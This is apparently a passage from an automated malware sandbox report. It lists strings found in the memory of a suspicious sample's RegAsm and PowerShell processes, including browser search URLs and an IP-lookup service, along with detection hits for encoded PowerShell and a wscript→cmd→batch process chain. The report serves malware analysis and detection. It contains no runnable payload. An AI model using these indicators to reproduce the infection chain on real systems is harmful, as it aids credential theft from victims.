                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                          Source: powershell.exe, 00000004.00000002.1648760741.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1713760985.0000000005361000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000003226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000003226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000003226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000003226000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000003226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                          Source: RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                          Source: powershell.exe, 00000005.00000002.1713760985.00000000054B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: powershell.exe, 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1739228665.0000000008BD5000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/binaryformatter
                          Source: powershell.exe, 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1739228665.0000000008BD5000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
                          Source: powershell.exe, 00000004.00000002.1648760741.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1713760985.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                          Source: powershell.exe, 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1739228665.0000000008BD5000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
                          Source: powershell.exe, 00000005.00000002.1719342950.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1857321756.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                          Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: powershell.exe, 00000005.00000002.1719342950.00000000063CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 00000005.00000002.1719342950.00000000063CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 00000005.00000002.1719342950.00000000063CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabS
                          Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: powershell.exe, 00000005.00000002.1713760985.00000000054B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 00000004.00000002.1650352774.0000000005EEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1719342950.00000000063CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeCode function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040571B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp20B6.tmpJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp20D7.tmpJump to dropped file

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: Process Memory Space: powershell.exe PID: 1188, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                          Source: Process Memory Space: powershell.exe PID: 7184, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                          Very long command line found
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 3918
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 3918Jump to behavior
                          Windows Scripting host queries suspicious COM object (likely to drop second stage)
                          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                          Wscript starts Powershell (via cmd or directly)
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
